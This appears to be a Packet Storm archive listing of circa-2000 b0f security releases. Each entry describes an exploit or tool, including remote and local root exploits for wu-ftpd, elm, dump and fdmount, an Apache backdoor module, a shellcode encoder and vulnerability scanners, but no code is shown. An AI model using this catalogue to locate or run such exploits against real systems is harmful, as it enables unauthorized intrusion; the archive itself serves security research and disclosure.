Section: .. / advisories / b0f /
| /// File Name: |
bobek.c |
Description:
|
Bobek.c is a Wu-Ftpd 2.6.0 remote root exploit (updated 05/08/2000). Bug is in the SITE EXEC command, an account is not required as anonymous access is enough. Tested against Redhat 6.2, FreeBSD 3.4-STABLE, and FreeBSD 5.0-CURRENT.
| | Author: | Venglin | | Homepage: | http://b0f.freebsd.lublin.pl | | File Size: | 14677 | | Last Modified: | Dec 6 03:10:00 2000 |
| MD5 Checksum: | 72aa028cb868dcaf240a98d147e3f193 |
|
| /// File Name: |
access-counter.pl |
Description:
|
The popular CGI web page access counter version 4.0.7 by George Burgyan allows execution of arbitrary commands due to unchecked user input. Commands are executed with the same privilege as the web server.
| | Author: | Slash | | Homepage: | http://b0f.freebsd.lublin.pl | | File Size: | 2753 | | Last Modified: | Sep 13 06:18:27 2000 |
| MD5 Checksum: | 2beb4c9aa7ffd4a6559b4ee451132a24 |
|
| /// File Name: |
lpset.pl |
Description:
|
Perl port of the /usr/bin/lpset local root vulnerability in Solaris/SPARC 2.7. Based on lpset.sh.
| | Author: | Slash | | Homepage: | http://b0f.freebsd.lublin.pl | | File Size: | 1416 | | Last Modified: | Sep 13 06:06:48 2000 |
| MD5 Checksum: | 273a18bea943ed29e39af2008e2f53e1 |
|
| /// File Name: |
sscan2k-pre4.HWA.tar.gz |
Description:
|
sscan was given to buffer0verfl0w security by jsbach for the project to be continued for jsbach. From now on sscan will go as sscan2k. sscan2k now has updated vulnerability checks and the code has also been cleaned up. This scanner is now a release of HWA.
| | Author: | eth0 | | Homepage: | http://hwa-security.net | | File Size: | 336183 | | Last Modified: | Aug 31 02:01:45 2000 |
| MD5 Checksum: | fa578e3f4a7d3b3965d3efbc2a1694dd |
|
| /// File Name: |
smegma_v0.4.tgz |
Description:
|
SMEGMA is an engine for generating garbled shellcode using several encryption mechanisms and making it self-decryptable by putting an Intel x86 machine-code decryptor in front of it. It uses a hand-written C lexer to grab the shellcode from sourcefiles and try and identify it. Use SMEGMA to modify shellcode in which characters get ruined by regular expressions (often seen in CGI binaries, web applications and webservers).
| | Author: | Scrippie | | Homepage: | http://b0f.freebsd.lublin.pl | | Changes: | Fixed all NULL byte problems - you can now use smegma to rid shellcode of NULL characters, more garbling algorithms, more efficient garbling algorithms, fixed the size problem. | | File Size: | 20173 | | Last Modified: | Jul 24 18:24:06 2000 |
| MD5 Checksum: | 651b6173fc24873f8ad4e5f846fba666 |
|
| /// File Name: |
smegma_v0.2.tgz |
Description:
|
SMEGMA is an engine for generating garbled shellcode using several encryption mechanisms and making it self-decryptable by putting an Intel x86 machine-code decryptor in front of it. It uses a hand-written C lexer to grab the shellcode from sourcefiles and try and identify it. Use SMEGMA to modify shellcode in which characters get ruined by regular expressions (often seen in CGI binaries, web applications and webservers).
| | Author: | Scrippie | | Homepage: | http://b0f.freebsd.lublin.pl | | File Size: | 11102 | | Last Modified: | Jul 8 07:56:51 2000 |
| MD5 Checksum: | 42981bfacdfe3138a8734be57bbed972 |
|
| /// File Name: |
htaccess-admin.tar.gz |
Description:
|
htaccess.tar - Perl script for adding users to the .htaccess file. Includes information on how to set up password protected web pages.
| | Author: | Slash | | Homepage: | http://b0f.freebsd.lublin.pl | | File Size: | 4591 | | Last Modified: | Jul 5 23:55:30 2000 |
| MD5 Checksum: | 27de7a057fe0c6373a9ad4390699239f |
|
| /// File Name: |
elm-exploit.c |
Description:
|
Linux Elm 2.4/2.5 local exploit - This will give you a shell(gid=12) if /usr/bin/elm is SGID. Tested on slackware 4.0 and redhat 5.1.
| | Author: | Slash | | Homepage: | http://b0f.freebsd.lublin.pl | | File Size: | 2111 | | Last Modified: | Jul 5 23:53:02 2000 |
| MD5 Checksum: | 82f10bfc8741bb629281379f2f03ccc9 |
|
| /// File Name: |
majordomeX.sh |
Description:
|
Majordomo v1.94.5 local linux exploit - run commands as the UID that majordomo runs under.
| | Author: | Slash | | Homepage: | http://b0f.freebsd.lublin.pl | | File Size: | 3665 | | Last Modified: | Jul 5 23:51:36 2000 |
| MD5 Checksum: | 5ce22449e2db60174798412395e28845 |
|
| /// File Name: |
rip.c |
Description:
|
rip.c is a local exploit for the dump package version 0.3-14 and 0.4b13 (restore binary). Tested against linux, gives a UID=0 shell on 2.2.16, GID=0 on 2.2.15 and below.
| | Author: | Scrippie | | Homepage: | http://b0f.freebsd.lublin.pl | | File Size: | 7097 | | Last Modified: | Jun 14 18:53:14 2000 |
| MD5 Checksum: | 72ac3db000356b4d9dbb3ddbe8d83541 |
|
| /// File Name: |
p0f.tgz |
Description:
|
P0f performs passive OS detection by watching SYN packets with tcpdump. Additionally, it is able to determine distance to remote host, and can be used to determine the structure of a foreign or local network. When running on the gateway of a network it is able to gather huge amounts of data and provide useful statistics. On a user-end computer it could be used to track which operating systems are making each connection. p0f supports full tcpdump-style filtering expressions, and has an easily modified fingerprinting database. Tested on Linux 2.0/2.2, FreeBSD, OpenBSD, NetBSD, SunOS, and Solaris.
| | Author: | Michal Zalewski | | Homepage: | http://lcamtuf.na.export.pl | | File Size: | 14685 | | Last Modified: | Jun 13 20:31:01 2000 |
| MD5 Checksum: | d461b6d2c9103f7fe52a387570ff87bc |
|
| /// File Name: |
sscan2k-pre3.b0f.tar.gz |
Description:
|
sscan2k is a remote auditing/vulnerability scanner which determines remote OS, and scans the host for applicable vulnerabilities. Features updated vulnerability checks, a scripting language, support for plugins and addons, configureable OS fingerprints, dns zone and subnet scans. Based off sscan by jsbach.
| | Author: | eth0 | | Homepage: | http://b0f.freebsd.lublin.pl | | Changes: | Fixes by mixter. | | File Size: | 336314 | | Last Modified: | Jun 8 22:22:42 2000 |
| MD5 Checksum: | f2afd7708edbbf1d301f9597e8fe4b30 |
|
| /// File Name: |
mod_backdoor.c |
Description:
|
Apache DSO backdoor - A get request to a "special" url allows remote command execution.
| | Author: | Slash | | Homepage: | http://b0f.freebsd.lublin.pl | | File Size: | 8809 | | Last Modified: | Jun 5 20:52:24 2000 |
| MD5 Checksum: | 84e2f164eca988c6647d0dc512f4536c |
|
| /// File Name: |
slirp_bof.c |
Description:
|
Slirp v1.0.10(RELEASE) local buffer overflow exploit for Linux which gives you a SGID shell if /usr/local/bin/slirp is mode 2755. Tested against Slackware 3.6. Includes perl script to find the offset.
| | Author: | Vade79 | | Homepage: | http://www.realhalo.org | | File Size: | 2368 | | Last Modified: | Jun 1 01:16:23 2000 |
| MD5 Checksum: | 9ddd6bd76e029236ad287810c937b7b6 |
|
| /// File Name: |
elm_last.c |
Description:
|
One last elm v2.4 / v2.5 exploit - gives EGID 12. This version works against almost all vulnerable versions of elm.
| | Author: | Vade79 | | Homepage: | http://www.realhalo.org | | File Size: | 2056 | | Last Modified: | Jun 1 01:12:00 2000 |
| MD5 Checksum: | 6d1932b3efa4e64a682800633f4c5a14 |
|
| /// File Name: |
sms.c |
Description:
|
sms.c is a remote SMS 1.8.2 (mail2sms gateway) long subject line remote buffer overflow exploit. Send the mail generated by this program and a shell will be listening on port 2222. Offsets adjusted for redhat.
| | Author: | Venglin | | Homepage: | http://b0f.freebsd.lublin.pl | | File Size: | 2324 | | Last Modified: | Jun 1 00:35:49 2000 |
| MD5 Checksum: | 836481971d25cd24f48a3187fca55303 |
|
| /// File Name: |
elm-ex.c |
Description:
|
Elm 2.5 PL3 exploit tested under linux Slackware 3.6, 4.0, 7.0.
| | Author: | Xfer | | Homepage: | http://b0f.freebsd.lublin.pl | | File Size: | 1505 | | Last Modified: | May 28 02:04:14 2000 |
| MD5 Checksum: | b9dbcee5ff2f4b064e0d41d4dcffe519 |
|
| /// File Name: |
filterape.c |
Description:
|
filterape.c exploits a new elm buffer overflow to get EGID mail on Slackware.
| | Author: | Scrippie | | Homepage: | http://b0f.freebsd.lublin.pl | | File Size: | 2686 | | Last Modified: | May 25 20:42:02 2000 |
| MD5 Checksum: | f86550706037b74cbfed63994fc2c787 |
|
| /// File Name: |
b0f5-Qpopper.txt |
Description:
|
BufferOverflow Security Advisory #5 - Remote shell via Qpopper2.53. qpop_euidl.c exploit included. Requires a qpop account and gives UID mail.
| | Author: | Prizm | | Homepage: | http://b0f.freebsd.lublin.pl | | File Size: | 5946 | | Last Modified: | May 24 21:55:59 2000 |
| MD5 Checksum: | 2a4401d33c14ffe9385bfcd5c4240512 |
|
| /// File Name: |
hellex.c |
Description:
|
hellex.c is a local buffer overflow exploit for the Hellkit 1.2 shellcode generation package. Tested on Red Hat 6.0.
| | Author: | Narrow | | Homepage: | http://b0f.freebsd.lublin.pl | | File Size: | 911 | | Last Modified: | May 23 17:33:52 2000 |
| MD5 Checksum: | 7e9d7f936be9cf422b078cf7e5a25146 |
|
| /// File Name: |
sscan2k-pre2.b0f.tar.gz |
Description:
|
sscan was given to buffer0verfl0w security by jsbach for the project to be continued for jsbach. From now on sscan will go as sscan2k. sscan2k now has updated vulnerability checks along with all the other great features it had before, improved OS detection (user can update the fingerprints by editing Osdefs.ms [which comes in sscan2k scripting language]), etc.
| | Author: | eth0, axess. Fixes: Mixter. | | Homepage: | http://www.b0f.com | | File Size: | 338859 | | Last Modified: | May 23 00:16:13 2000 |
| MD5 Checksum: | 3ee58f3c6e90d5e587cc8b068b22548d |
|
| /// File Name: |
shellhit.c |
Description:
|
shellhit.c - TESO Hellkit contains a buffer overflow - exploit is just meant to be funny. To all scriptkiddies: You won't get root from this, go and find something more useful.
| | Author: | scrippie | | Homepage: | http://b0f.freebsd.lublin.pl | | File Size: | 1758 | | Last Modified: | May 22 19:47:15 2000 |
| MD5 Checksum: | 6d6584ebc64b16234ea4a4c96a84f24a |
|
| /// File Name: |
syrin15.zip |
Description:
|
Buffer Syringe is a tool for win32 that tests a daemon for buffer overflow on it's parameter(s) sort of "brute forcing" or "stressing" the daemon by means of injecting a user specified parameter or a command with a value of a user specified number of characters to the daemon. Chances are, if the parameter being tested is vulnerable to an overflow, and the user specified number of characters exceeds that of the parameter's limit, then the daemon would likely crash.
| | Author: | Digital Monkey | | Homepage: | http://b0f.freebsd.lublin.pl | | File Size: | 27016 | | Last Modified: | May 17 18:37:34 2000 |
| MD5 Checksum: | 51bab6a00325ec97984338d5a6892f72 |
|
| /// File Name: |
fdmnt-smash2.c |
Description:
|
fdmount local root exploit - tested on Slackware 4.0. Must be in the floppy group. Modified from last version to work on Slackware 7.
| | Author: | Scrippie | | Homepage: | http://b0f.freebsd.lublin.pl | | File Size: | 3165 | | Last Modified: | May 17 18:33:38 2000 |
| MD5 Checksum: | 73ba3d26ba0ca02c1bd711b6e11af39d |
|
| /// File Name: |
Neon_beta5.c |
Description:
|
Neon beta5 - Simple Host or Iplist cgi Scanner which does 358 checks.
| | Author: | Axess | | Homepage: | http://b0f.freebsd.lublin.pl | | Changes: | Added more cgi, fixed better output. | | File Size: | 37156 | | Last Modified: | May 12 04:48:01 2000 |
| MD5 Checksum: | 0f51bd2e126eb23a4b2bb5ea4e549ad8 |
|
|
|
|
|
![.:[ packet storm ]:.](/images/ps-ani.gif)
